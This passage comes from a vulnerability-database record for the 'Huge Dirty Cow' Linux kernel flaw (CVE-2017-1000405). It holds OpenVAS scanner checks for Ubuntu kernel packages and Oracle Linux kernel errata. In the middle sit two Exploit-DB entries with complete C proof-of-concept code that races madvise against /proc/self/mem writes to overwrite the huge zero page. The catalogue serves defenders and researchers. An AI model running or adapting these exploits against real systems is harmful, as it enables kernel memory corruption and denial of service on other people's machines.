isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.4.0.1079.79\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-snapdragon\", ver:\"4.4.0.1081.73\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-09T00:00:00", "id": "OPENVAS:1361412562310843400", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843400", "title": "Ubuntu Update for linux-aws USN-3509-2", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3509_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-aws USN-3509-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843400\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-09 07:39:26 +0100 (Sat, 09 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12193\", \"CVE-2017-16643\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-aws USN-3509-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3509-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\n Ubuntu 14.04 LTS. Mohamed Ghannam discovered that a use-after-free vulnerability\n existed in the Netlink subsystem (XFRM) in the Linux kernel. A local attacker\n could use this to cause a denial of service (system crash) or possibly execute\n arbitrary code. (CVE-2017-16939) It was discovered that the Linux kernel did not\n properly handle copy-on- write of transparent huge pages. A local attacker could\n use this to cause a denial of service (application crashes) or possibly gain\n administrative privileges. (CVE-2017-1000405) Fan Wu, Haoran Qiu, and Shixiong\n Zhao discovered that the associative array implementation in the Linux kernel\n sometimes did not properly handle adding a new entry. A local attacker could use\n this to cause a denial of service (system crash). (CVE-2017-12193) Andrey\n Konovalov discovered an out-of-bounds read in the GTCO digitizer USB driver for\n the Linux kernel. A physically proximate attacker could use this to cause a\n denial of service (system crash) or possibly execute arbitrary code.\n (CVE-2017-16643)\");\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3509-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3509-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1005-aws\", ver:\"4.4.0-1005.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-generic-lpae\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-lowlatency\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-e500mc\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc-smp\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-emb\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-103-powerpc64-smp\", ver:\"4.4.0-103.126~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1005.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp-lts-xenial\", ver:\"4.4.0.103.86\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2018-05-24T14:08:25", "bulletinFamily": "exploit", "description": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2). CVE-2017-1000405. Dos exploit for Linux platform", "modified": "2017-12-11T00:00:00", "published": "2017-12-11T00:00:00", "id": "EDB-ID:44305", "href": "https://www.exploit-db.com/exploits/44305/", "type": "exploitdb", "title": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)", "sourceData": "/*\r\n * The code is modified from https://www.exploit-db.com/exploits/43199/\r\n */\r\n#define _GNU_SOURCE\r\n#include <unistd.h>\r\n#include <sys/mman.h>\r\n#include <err.h>\r\n#include <stdio.h>\r\n#include <string.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h>\r\n#include <sys/stat.h>\r\n#include <sched.h>\r\n#include <pthread.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n\r\n#define TRIES_PER_PAGE (20000000)\r\n#define PAGE_SIZE (0x1000)\r\n#define MEMESET_VAL (0x41)\r\n#define MAP_SIZE (0x200000)\r\n#define STRING \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"\r\n#define OFFSIZE ((sizeof(STRING)-1)/sizeof(char))\r\n\r\nstruct args{\r\n int fd;\r\n void *p;\r\n int stop;\r\n off_t off;\r\n char *chp;\r\n};\r\n\r\nvoid *write_thread(struct args *arg) {\r\n for (int i = 0; i < TRIES_PER_PAGE && !arg->stop; i++) {\r\n lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);\r\n write(arg->fd, STRING, sizeof(STRING));\r\n lseek(arg->fd, (off_t)(arg->chp + arg->off*OFFSIZE), SEEK_SET);\r\n }\r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct args *arg) {\r\n while(*(arg->chp+arg->off*OFFSIZE) != 'A') {\r\n int i = madvise(arg->p, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n arg->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main(void) {\r\n struct args arg;\r\n\r\n arg.off = 0;\r\n \r\n arg.p = mmap((void*)0x40000000, MAP_SIZE, PROT_READ, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);\r\n \r\n if(arg.p == MAP_FAILED)\r\n perror(\"[!] mmap()\");\r\n arg.chp = arg.p;\r\n printf(\"mmap address is %p\\n\", arg.p);\r\n madvise(arg.p, MAP_SIZE, MADV_HUGEPAGE);\r\n\r\n arg.fd = open(\"/proc/self/mem\", O_RDWR);\r\n if (arg.fd < 0) {\r\n perror(\"[!] open()\");\r\n return 1;\r\n }\r\n \r\n \r\n while(arg.off < PAGE_SIZE/sizeof(STRING)) {\r\n arg.stop = 0;\r\n pthread_t thread0, thread1;\r\n int ret = pthread_create(&thread0, NULL, (void *)wait_for_success, &arg);\r\n ret |= pthread_create(&thread1, NULL, (void *)write_thread, &arg);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n return 1;\r\n }\r\n \r\n pthread_join(thread0, NULL);\r\n pthread_join(thread1, NULL); \r\n \r\n printf(\"[*] Done 0x%x String\\n\", arg.off);\r\n arg.off++;\r\n }\r\n printf(\"[*] Overwrite a page\\n\");\r\n printf(\"%s\\n\", arg.p);\r\n return 0;\r\n}", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44305/"}, {"lastseen": "2017-12-01T13:01:22", "bulletinFamily": "exploit", "description": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page. CVE-2017-1000405. Dos exploit for Linux platform", "modified": "2017-11-30T00:00:00", "published": "2017-11-30T00:00:00", "id": "EDB-ID:43199", "href": "https://www.exploit-db.com/exploits/43199/", "type": "exploitdb", "title": "Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page", "sourceData": "// EDB Note: Source ~ https://medium.com/bindecy/huge-dirty-cow-cve-2017-1000405-110eca132de0\r\n// EDB Note: Source ~ https://github.com/bindecy/HugeDirtyCowPOC\r\n// Author Note: Before running, make sure to set transparent huge pages to \"always\": \r\n// `echo always | sudo tee /sys/kernel/mm/transparent_hugepage/enabled`\r\n//\r\n\r\n//\r\n// The Huge Dirty Cow POC. This program overwrites the system's huge zero page.\r\n// Compile with \"gcc -pthread main.c\"\r\n//\r\n// November 2017\r\n// Bindecy\r\n//\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <fcntl.h> \r\n#include <unistd.h> \r\n#include <sched.h>\r\n#include <string.h>\r\n#include <pthread.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h> \r\n\r\n#define MAP_BASE ((void *)0x4000000)\r\n#define MAP_SIZE (0x200000)\r\n#define MEMESET_VAL (0x41)\r\n#define PAGE_SIZE (0x1000)\r\n#define TRIES_PER_PAGE (20000000)\r\n\r\nstruct thread_args {\r\n char *thp_map;\r\n char *thp_chk_map;\r\n off_t off;\r\n char *buf_to_write;\r\n int stop;\r\n int mem_fd1;\r\n int mem_fd2;\r\n};\r\n\r\ntypedef void * (*pthread_proc)(void *);\r\n\r\nvoid *unmap_and_read_thread(struct thread_args *args) {\r\n char c;\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) { \r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Discard the temporary COW page.\r\n \r\n memcpy(&c, args->thp_map + args->off, sizeof(c));\r\n read(args->mem_fd2, &c, sizeof(c));\r\n \r\n lseek(args->mem_fd2, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n usleep(10); // We placed the zero page and marked its PMD as dirty. \r\n // Give get_user_pages() another chance before madvise()-ing again.\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *write_thread(struct thread_args *args) {\r\n int i;\r\n for (i = 0; i < TRIES_PER_PAGE && !args->stop; i++) {\r\n lseek(args->mem_fd1, (off_t)(args->thp_map + args->off), SEEK_SET);\r\n madvise(args->thp_map, MAP_SIZE, MADV_DONTNEED); // Force follow_page_mask() to fail.\r\n write(args->mem_fd1, args->buf_to_write, PAGE_SIZE);\r\n }\r\n \r\n return NULL;\r\n}\r\n\r\nvoid *wait_for_success(struct thread_args *args) {\r\n while (args->thp_chk_map[args->off] != MEMESET_VAL) {\r\n madvise(args->thp_chk_map, MAP_SIZE, MADV_DONTNEED);\r\n sched_yield();\r\n }\r\n\r\n args->stop = 1;\r\n return NULL;\r\n}\r\n\r\nint main() {\r\n struct thread_args args;\r\n void *thp_chk_map_addr;\r\n int ret;\r\n\r\n // Mapping base should be a multiple of the THP size, so we can work with the whole huge page.\r\n args.thp_map = mmap(MAP_BASE, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);\r\n if (args.thp_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n return -1;\r\n }\r\n if (args.thp_map != MAP_BASE) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the vulnerable mapping.\\n\");\r\n goto err_unmap1;\r\n }\r\n \r\n printf(\"[*] The beginning of the zero huge page: %lx\\n\", *(unsigned long *)args.thp_map);\r\n\r\n thp_chk_map_addr = (char *)MAP_BASE + (MAP_SIZE * 2); // MAP_SIZE * 2 to avoid merge\r\n args.thp_chk_map = mmap(thp_chk_map_addr, MAP_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); \r\n if (args.thp_chk_map == MAP_FAILED) {\r\n perror(\"[!] mmap()\");\r\n goto err_unmap1;\r\n }\r\n if (args.thp_chk_map != thp_chk_map_addr) {\r\n fprintf(stderr, \"[!] Didn't get desired base address for the check mapping.\\n\");\r\n goto err_unmap2;\r\n }\r\n \r\n ret = madvise(args.thp_map, MAP_SIZE, MADV_HUGEPAGE); \r\n ret |= madvise(args.thp_chk_map, MAP_SIZE, MADV_HUGEPAGE);\r\n if (ret) {\r\n perror(\"[!] madvise()\");\r\n goto err_unmap2;\r\n }\r\n\r\n args.buf_to_write = malloc(PAGE_SIZE);\r\n if (!args.buf_to_write) {\r\n perror(\"[!] malloc()\");\r\n goto err_unmap2;\r\n }\r\n memset(args.buf_to_write, MEMESET_VAL, PAGE_SIZE);\r\n \r\n args.mem_fd1 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd1 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_free;\r\n }\r\n \r\n args.mem_fd2 = open(\"/proc/self/mem\", O_RDWR);\r\n if (args.mem_fd2 < 0) {\r\n perror(\"[!] open()\");\r\n goto err_close1;\r\n }\r\n\r\n printf(\"[*] Racing. Gonna take a while...\\n\");\r\n args.off = 0;\r\n\r\n // Overwrite every single page\r\n while (args.off < MAP_SIZE) { \r\n pthread_t threads[3]; \r\n args.stop = 0;\r\n \r\n ret = pthread_create(&threads[0], NULL, (pthread_proc)wait_for_success, &args);\r\n ret |= pthread_create(&threads[1], NULL, (pthread_proc)unmap_and_read_thread, &args);\r\n ret |= pthread_create(&threads[2], NULL, (pthread_proc)write_thread, &args);\r\n \r\n if (ret) {\r\n perror(\"[!] pthread_create()\");\r\n goto err_close2;\r\n }\r\n \r\n pthread_join(threads[0], NULL); // This call will return only after the overwriting is done\r\n pthread_join(threads[1], NULL);\r\n pthread_join(threads[2], NULL);\r\n\r\n args.off += PAGE_SIZE; \r\n printf(\"[*] Done 0x%lx bytes\\n\", args.off);\r\n }\r\n \r\n printf(\"[*] Success!\\n\");\r\n \r\nerr_close2:\r\n close(args.mem_fd2);\r\nerr_close1:\r\n close(args.mem_fd1);\r\nerr_free:\r\n free(args.buf_to_write);\r\nerr_unmap2:\r\n munmap(args.thp_chk_map, MAP_SIZE);\r\nerr_unmap1:\r\n munmap(args.thp_map, MAP_SIZE);\r\n \r\n if (ret) {\r\n fprintf(stderr, \"[!] Exploit failed.\\n\");\r\n }\r\n \r\n return ret;\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43199/"}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:11", "bulletinFamily": "unix", "description": "[4.1.12-112.14.13]\n- Revert 'kernel.spec: Require the new microcode_ctl.' (Brian Maly)\n[4.1.12-112.14.12]\n- xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: 27386890] \n- xen-blkback: move indirect req allocation out-of-line (Ankur Arora) [Orabug: 27386890] \n- xen-blkback: pull nseg validation out in a function (Ankur Arora) [Orabug: 27386890] \n- xen-blkback: make struct pending_req less monolithic (Ankur Arora) [Orabug: 27386890] \n- x86: Clean up IBRS functionality resident in common code (Kanth Ghatraju) [Orabug: 27403317] \n- x86: Display correct settings for the SPECTRE_V2 bug (Kanth Ghatraju) [Orabug: 27403317] \n- Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth Ghatraju) [Orabug: 27403317] \n- x86/cpu: Implement CPU vulnerabilites sysfs functions (Thomas Gleixner) [Orabug: 27403317] \n- sysfs/cpu: Fix typos in vulnerability documentation (David Woodhouse) [Orabug: 27403317] \n- sysfs/cpu: Add vulnerability folder (Thomas Gleixner) [Orabug: 27403317] \n- x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David Woodhouse) [Orabug: 27403317] \n- x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth Ghatraju) [Orabug: 27403317] \n- KVM: x86: Add memory barrier on vmcs field lookup (Andrew Honig) {CVE-2017-5753}\n- KVM: VMX: remove I/O port 0x80 bypass on Intel hosts (Andrew Honig) [Orabug: 27402301] {CVE-2017-1000407} {CVE-2017-1000407}\n- xfs: give all workqueues rescuer threads (Chris Mason) [Orabug: 27397568] \n- ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao Martins) [Orabug: 27397001]", "modified": "2018-01-18T00:00:00", "published": "2018-01-18T00:00:00", "id": "ELSA-2018-4017", "href": "http://linux.oracle.com/errata/ELSA-2018-4017.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:36", "bulletinFamily": "unix", "description": "[4.1.12-103.10.1]\n- mm, thp: Do not make page table dirty unconditionally in follow_trans_huge_pmd() (Kirill A. Shutemov) [Orabug: 27200879] {CVE-2017-1000405}\n- NFS: Add static NFS I/O tracepoints (Chuck Lever) \n- storvsc: dont assume SG list is contiguous (Aruna Ramakrishna) [Orabug: 27044692] \n- fix unbalanced page refcounting in bio_map_user_iov (Vitaly Mayatskikh) [Orabug: 27069038] {CVE-2017-12190}\n- more bio_map_user_iov() leak fixes (Al Viro) [Orabug: 27069038] {CVE-2017-12190}\n- packet: in packet_do_bind, test fanout with bind_lock held (Willem de Bruijn) [Orabug: 27069065] {CVE-2017-15649}\n- packet: hold bind lock when rebinding to fanout hook (Willem de Bruijn) [Orabug: 27069065] {CVE-2017-15649}\n- net: convert packet_fanout.sk_ref from atomic_t to refcount_t (Reshetova, Elena) [Orabug: 27069065] {CVE-2017-15649}\n- packet: fix races in fanout_add() (Eric Dumazet) [Orabug: 27069065] {CVE-2017-15649}\n- refcount_t: Introduce a special purpose refcount type (Peter Zijlstra) [Orabug: 27069065] {CVE-2017-15649}\n- locking/atomics: Add _{acquire|release|relaxed}() variants of some atomic operations (Will Deacon) [Orabug: 27069065] {CVE-2017-15649}\n- net: qmi_wwan: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27215225] {CVE-2017-16650}\n- ALSA: usb-audio: Kill stray URB at exiting (Takashi Iwai) [Orabug: 27148276] {CVE-2017-16527}\n- scsi: Add STARGET_CREATED_REMOVE state to scsi_target_state (Ewan D. Milne) [Orabug: 27187217] \n- ocfs2: fix posix_acl_create deadlock (Junxiao Bi) [Orabug: 27126129] \n- scsi: Dont abort scsi_scan due to unexpected response (John Sobecki) [Orabug: 27119628] \n- ocfs2: code clean up for direct io (Ryan Ding) \n- xscore: add dma address check (Zhu Yanjun) [Orabug: 27076919] \n- KVM: nVMX: Fix loss of L2s NMI blocking state (Wanpeng Li) [Orabug: 27062498] \n- KVM: nVMX: track NMI blocking state separately for each VMCS (Paolo Bonzini) [Orabug: 27062498] \n- KVM: VMX: require virtual NMI support (Paolo Bonzini) [Orabug: 27062498] \n- KVM: nVMX: Fix the NMI IDT-vectoring handling (Wanpeng Li) [Orabug: 27062498] \n- uek-rpm: disable CONFIG_NUMA_BALANCING_DEFAULT_ENABLED (Fred Herard) [Orabug: 26798697] \n- thp: run vma_adjust_trans_huge() outside i_mmap_rwsem (Kirill A. Shutemov) [Orabug: 27026180] \n- selinux: fix off-by-one in setprocattr (Stephen Smalley) [Orabug: 27001717] {CVE-2017-2618} {CVE-2017-2618} {CVE-2017-2618}\n- sysctl: Drop reference added by grab_header in proc_sys_readdir (Zhou Chengming) [Orabug: 27036903] {CVE-2016-9191} {CVE-2016-9191} {CVE-2016-9191}\n- KEYS: prevent KEYCTL_READ on negative key (Eric Biggers) [Orabug: 27050248] {CVE-2017-12192}\n- IB/ipoib: For sendonly join free the multicast group on leave (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: increase the max mcast backlog queue (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Make sendonly multicast joins create the mcast group (Doug Ledford) [Orabug: 27077718] \n- IB/ipoib: Expire sendonly multicast joins (Christoph Lameter) [Orabug: 27077718] \n- IB/ipoib: Suppress warning for send only join failures (Jason Gunthorpe) [Orabug: 27077718] \n- IB/ipoib: Clean up send-only multicast joins (Doug Ledford) [Orabug: 27077718] \n- netlink: allow to listen 'all' netns (Nicolas Dichtel) [Orabug: 27077944] \n- netlink: rename private flags and states (Nicolas Dichtel) [Orabug: 27077944] \n- netns: use a spin_lock to protect nsid management (Nicolas Dichtel) [Orabug: 27077944] \n- netns: notify new nsid outside __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: rename peernet2id() to peernet2id_alloc() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: always provide the id to rtnl_net_fill() (Nicolas Dichtel) [Orabug: 27077944] \n- netns: returns always an id in __peernet2id() (Nicolas Dichtel) [Orabug: 27077944] \n- Hang/soft lockup in d_invalidate with simultaneous calls (Al Viro) [Orabug: 27052681] \n- Revert 'drivers/char/mem.c: deny access in open operation when securelevel is set' (Brian Maly) [Orabug: 27037811]", "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "ELSA-2017-3651", "href": "http://linux.oracle.com/errata/ELSA-2017-3651.html", "title": "Unbreakable Enterprise kernel security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:41", "bulletinFamily": "unix", "description": "[4.1.12-124.14.1]\n- ctf: drop the run-as-root error (Nick Alcock) [Orabug: 27852654] \n- rds: Node crashes when trace buffer is opened (Ka-Cheong Poon) [Orabug: 27846191] \n- xfs: fix accidental reversion of aa6a6227435cb (Darrick J. Wong) [Orabug: 27845869]\n[4.1.12-124.13.1]\n- net: cdc_ether: fix divide by 0 on bad descriptors (Bjorn Mork) [Orabug: 27841392] {CVE-2017-16649}\n- sysctl: Drop reference added by grab_header in proc_sys_readdir (Zhou Chengming) [Orabug: 27841944] {CVE-2016-9191} {CVE-2016-9191} {CVE-2016-9191}\n- Revert 'sysctl: Drop reference added by grab_header in proc_sys_readdir' (Jack Vogel)\n[4.1.12-124.12.1]\n- xfs: remove 'no-allocation' reservations for file creations (Darrick J. Wong) [Orabug: 27609439] \n- xfs: dont print warnings when xfs_log_force fails (Christoph Hellwig) [Orabug: 27609404] \n- xfs: Properly retry failed dquot items in case of error during buffer writeback (Carlos Maiolino) [Orabug: 27609404] \n- xfs: Properly retry failed inode items in case of error during buffer writeback (Carlos Maiolino) [Orabug: 27609404] \n- xfs: Add infrastructure needed for error propagation during buffer IO failure (Carlos Maiolino) [Orabug: 27609404] \n- xfs: remove xfs_trans_ail_delete_bulk (Christoph Hellwig) [Orabug: 27609404] \n- xfs: fix and streamline error handling in xfs_end_io (Darrick J. Wong) [Orabug: 27609404] \n- xfs: dont leave EFIs on AIL on mount failure (Brian Foster) [Orabug: 27609404] \n- xfs: use EFI refcount consistently in log recovery (Brian Foster) [Orabug: 27609404] \n- xfs: ensure EFD trans aborts on log recovery extent free failure (Brian Foster) [Orabug: 27609404] \n- xfs: fix efi/efd error handling to avoid fs shutdown hangs (Brian Foster) [Orabug: 27609404] \n- xfs: return committed status from xfs_trans_roll() (Brian Foster) [Orabug: 27609404] \n- xfs: disentagle EFI release from the extent count (Brian Foster) [Orabug: 27609404]\n[4.1.12-124.11.1]\n- netfilter: ebtables: CONFIG_COMPAT: dont trust userland offsets (Florian Westphal) [Orabug: 27774012] {CVE-2018-1068}\n- ACPI / PAD: dont register acpi_pad driver if running as Xen dom0 (Juergen Gross) [Orabug: 27796473] \n- sched/fair: Fix typo in sync_throttle() (Xunlei Pang) [Orabug: 27787518] \n- sched/fair: Do not announce throttled next buddy in dequeue_task_fair() (Konstantin Khlebnikov) [Orabug: 27787518] \n- sched/fair: Initialize and rework throttle_count for new task-groups (Peter Zijlstra) [Orabug: 27787518] \n- perf tools: Move syscall number fallbacks from perf-sys.h to tools/arch/x86/include/asm/ (Arnaldo Carvalho de Melo) [Orabug: 27240053] \n- crypto: FIPS - allow tests to be disabled in FIPS mode (Stephan Mueller) [Orabug: 27809271] \n- crypto: xts - consolidate sanity check for keys (Stephan Mueller) [Orabug: 27809271] \n- crypto: rng - Zero seed in crypto_rng_reset (Herbert Xu) [Orabug: 27809271] \n- enic: set IG desc cache flag in open (Govindarajulu Varadarajan) [Orabug: 27587345]\n[4.1.12-124.10.1]\n- Drivers: hv: utils: fix crash when device is removed from host side (Vitaly Kuznetsov) [Orabug: 27426102] \n- Drivers: hv: utils: introduce HVUTIL_TRANSPORT_DESTROY mode (Vitaly Kuznetsov) [Orabug: 27426102] \n- Drivers: hv: utils: rename outmsg_lock (Vitaly Kuznetsov) [Orabug: 27426102] \n- Drivers: hv: utils: fix memory leak on on_msg() failure (Vitaly Kuznetsov) [Orabug: 27426102] \n- Drivers: hv: utils: use memdup_user in hvt_op_write (Olaf Hering) [Orabug: 27426102] \n- hv: util: checking the wrong variable (Dan Carpenter) [Orabug: 27426102] \n- net/rds: Avoid copy overhead if send buff is full (Gerd Rausch) [Orabug: 27747165] \n- ext4: fix ->put_link panic (Junxiao Bi) [Orabug: 27498770] \n- KVM/VMX: Clear spec_ctrl status when resetting vcpu (Patrick Colp) \n- mlx4: change the ICM table allocations to lowest needed size (Daniel Jurgens) [Orabug: 27718303] \n- Revert 'Drivers: hv: utils: fix a race on userspace daemons registration' (Jack Vogel) [Orabug: 27673755]\n[4.1.12-124.9.1]\n- crypto: af_alg - Avoid sock_graft call warning (Herbert Xu) [Orabug: 26895616] \n- iscsi-target: Fix initial login PDU asynchronous socket close OOPs (Nicholas Bellinger) [Orabug: 27701211] \n- target/iscsi: 